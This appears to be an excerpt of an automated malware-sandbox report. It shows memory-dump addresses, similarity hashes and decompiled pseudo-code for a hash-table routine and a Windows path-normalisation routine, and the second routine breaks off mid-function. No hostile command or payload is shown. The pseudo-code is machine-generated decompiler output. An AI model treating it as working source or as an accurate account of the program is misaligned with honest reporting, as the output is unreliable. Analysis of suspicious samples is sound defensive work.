0x030e6372
0x030e637a
0x030e637b
0x030e637d
0x00000000
0x00000000
0x030e637f
0x030e6385
0x00000000
0x030e6385
0x030e5d38
0x030e5d3b
0x00000000
0x00000000
0x00000000
0x030e5d3b
0x030e5d27
0x030e5d29
0x00000000
0x00000000
0x00000000
0x030e6360
0x00000000
0x030e6360
0x030e5c10
0x030e5c10
0x030e63da
0x030e63e5
0x030e63e5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60eb98c86a014e8077fcb19c9501e24bbbb61b0901fab1d5033bf1b6d32510e
Instruction ID: 9c22c198c0bbe2c0d72cba056a907f70a46cdb32792d7acf3774de58e0367734
Opcode Fuzzy Hash: f60eb98c86a014e8077fcb19c9501e24bbbb61b0901fab1d5033bf1b6d32510e
Instruction Fuzzy Hash: A2426875A01229CFDB64CF68C880BAAB7F1FF49304F1885AAD94DAB242D7359985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 030EE824, Relevance: .5, Instructions: 493
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E030EE824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x310d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L0303FAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E0303FA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x310b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E03032280(E0305F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E0302FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x310b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E0305B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E0304F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x310b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x310b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E030EE7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E030EE7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E030EE7A8(_t38) == 0) {
									_t406 = 0;
								}
								E0303FA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E030EE7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x030ee833
0x030ee839
0x030ee83e
0x030ee841
0x030ee848
0x030ee84b
0x030ee851
0x030ee8b2
0x030ee8b2
0x030ee8b5
0x030ee90b
0x030ee911
0x030ee913
0x030ee913
0x030ee91a
0x030ee91d
0x030ee922
0x030ee924
0x030ee924
0x030ee924
0x030ee92f
0x030ee933
0x030ee935
0x030ee93a
0x030ee940
0x030ee948
0x030ee950
0x030ee955
0x00000000
0x00000000
0x030ee957
0x030ee95c
0x030ee9cb
0x030ee9d2
0x030ee9d4
0x030ee9f2
0x030ee9f6
0x030eea10
0x030eea18
0x030eea1a
0x030eea1f
0x030eea2c
0x030eea2d
0x030eea2e
0x030eea32
0x030eea3d
0x030eea42
0x030eea45
0x030eea51
0x030eea60
0x030eea65
0x030eea68
0x030eea6a
0x030eea6a
0x030eea6a
0x030eea6f
0x030eea76
0x030eea7c
0x030eea7e
0x030eea81
0x030eea85
0x030eea88
0x030eea8c
0x030eea8f
0x030eea93
0x030eea98
0x00000000
0x00000000
0x030eea9a
0x030eea9d
0x030eeaa2
0x030eeb0e
0x030eeb15
0x030eeb17
0x030eeb33
0x030eeb36
0x030eeb39
0x030eeb3f
0x030eeb45
0x030eeb4a
0x030eeb52
0x030eecb1
0x030eecb9
0x030eecbe
0x030eecc3
0x030eecc6
0x030eeceb
0x030eecee
0x030eecf9
0x030eecfe
0x030eed00
0x030eed05
0x030eed07
0x030eed0a
0x030eed0c
0x030eed0e
0x030eed12
0x030eed19
0x030eed1e
0x030eed24
0x030eed2a
0x030eed2a
0x030eed2c
0x030eed3e
0x030eed3e
0x030eeb5a
0x030eeb62
0x030eeb69
0x00000000
0x00000000
0x030eeb6f
0x030eeb75
0x030eeb79
0x030eeb79
0x030eeb88
0x030eeb8e
0x030eeb90
0x030eeb92
0x030eeb97
0x030eed3f
0x030eed45
0x00000000
0x00000000
0x030eed4b
0x030eed4e
0x00000000
0x030eeb9d
0x030eeb9d
0x030eeb9d
0x030eeba2
0x030eebb5
0x030eebbc
0x030eebbe
0x030eebbe
0x030eebc3
0x030eebc5
0x030eebcb
0x030eebd2
0x030eebd5
0x030eebdb
0x030eebdf
0x030eebe1
0x030eebf0
0x030eebf9
0x030eec04
0x030eec07
0x030eec0a
0x030eec82
0x030eec85
0x030eec8b
0x030eec91
0x030eec93
0x030eec96
0x030eec9b
0x030eeca6
0x030eecac
0x030eecae
0x030eecae
0x00000000
0x00000000
0x00000000
0x00000000
0x030eec0c
0x030eec0c
0x030eec0c
0x030eec0f
0x030eec12
0x030eec15
0x030eec15
0x030eec18
0x030eec1e
0x00000000
0x00000000
0x030eec22
0x030eec28
0x030eec4b
0x030eec5b
0x030eec5d
0x030eec63
0x030eec65
0x030eec68
0x030eec6b
0x030eec6b
0x030eec70
0x030eec71
0x030eec74
0x030eec7d
0x00000000
0x030eebe3
0x030eebe3
0x030eebe6
0x030eebe6
0x030eebe7
0x030eebe9
0x030eebec
0x00000000
0x030eebe6
0x030eebe1
0x030eeba4
0x030eeba9
0x030eebb0
0x030eebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x030eebab
0x030eebab
0x030eebab
0x030eebac
0x030eebac
0x00000000
0x030eebab
0x030eeb97
0x030eeb19
0x030eeb1c
0x030eeb21
0x030eeb26
0x030eeb2c
0x030eeb2c
0x00000000
0x030eeb26
0x030eead6
0x030eead9
0x030eeadc
0x030eeadc
0x030eeadc
0x030eeade
0x030eeae4
0x00000000
0x00000000
0x030eeaee
0x030eeaf7
0x030eeaf9
0x00000000
0x00000000
0x030eeb04
0x030eeb12
0x00000000
0x030eeb12
0x030eeb06
0x00000000
0x030eeb06
0x030eeaf0
0x030eeaf2
0x030eeaf4
0x00000000
0x030eeaf4
0x030eea6a
0x030eea21
0x00000000
0x030eea21
0x030ee9d6
0x030ee9d6
0x030ee9e0
0x030ee9e2
0x030ee9e2
0x030ee9e8
0x00000000
0x030ee9e8
0x030ee987
0x030ee98f
0x030ee992
0x030ee995
0x030ee995
0x030ee998
0x030ee998
0x030ee99a
0x030ee9a0
0x00000000
0x00000000
0x030ee9a9
0x030ee9b2
0x030ee9b4
0x00000000
0x00000000
0x030ee9ba
0x030ee9c1
0x030ee9cf
0x00000000
0x030ee9cf
0x030ee9c3
0x00000000
0x030ee9c3
0x030ee9ab
0x030ee9ad
0x030ee9af
0x00000000
0x030ee9af
0x030ee924
0x030ee8b7
0x030ee8ba
0x030ee902
0x030ee908
0x030ee90a
0x00000000
0x030ee90a
0x030ee8bc
0x030ee8bf
0x030ee8f9
0x030ee8ff
0x030ee901
0x00000000
0x030ee901
0x030ee8c1
0x030ee8c4
0x030ee8f0
0x030ee8f6
0x030ee8f8
0x00000000
0x030ee8f8
0x030ee8c6
0x030ee8c9
0x030ee8e7
0x030ee8ed
0x030ee8ef
0x00000000
0x030ee8ef
0x030ee8cb
0x030ee8ce
0x030ee8de
0x030ee8e4
0x030ee8e6
0x00000000
0x030ee8e6
0x030ee8d3
0x00000000
0x030ee8d5
0x030ee8db
0x030ee8dd
0x00000000
0x030ee8dd
0x030ee853
0x030ee855
0x030ee85b
0x030ee85d
0x030ee897
0x030ee89c
0x030ee8a2
0x030ee8a6
0x030ee8ab
0x030ee8ad
0x030ee8ad
0x00000000
0x030ee85d

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4caf545f2d6b50730dcec4a3f15a16dd9a3a8f110c72358fc3d0f235b0514a52
Instruction ID: 7be9dccad0822a3c6188ee0827c154335c8677f3162298d930be6b998a4dad4a
Opcode Fuzzy Hash: 4caf545f2d6b50730dcec4a3f15a16dd9a3a8f110c72358fc3d0f235b0514a52
Instruction Fuzzy Hash: 5002B272F016199FCB58CFA9C8916BEFBF6AF88200B19856DD496DB390D734E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03036E30, Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E03036E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x30efca8);
				_push(0x30617f0);
				_push( *[fs:0x0]);
				_t312 =  *0x310d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E0305FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E030374C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E03049BC6( &_v52, 0x2ff1080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E03059377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E030946A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M0303749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E030152A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L03022600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L03022600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L03094735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E0305BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E03042010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L03094658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E03049BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E030152A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L030183AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E030152A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L030183AE(_t428);
														L80:
														E03049BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x2ff1080;
														_v72 =  *0x2ff1080;
														__eax =  *0x2ff1084;
														_v68 =  *0x2ff1084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E03049BC6(__ecx,  &_v72);
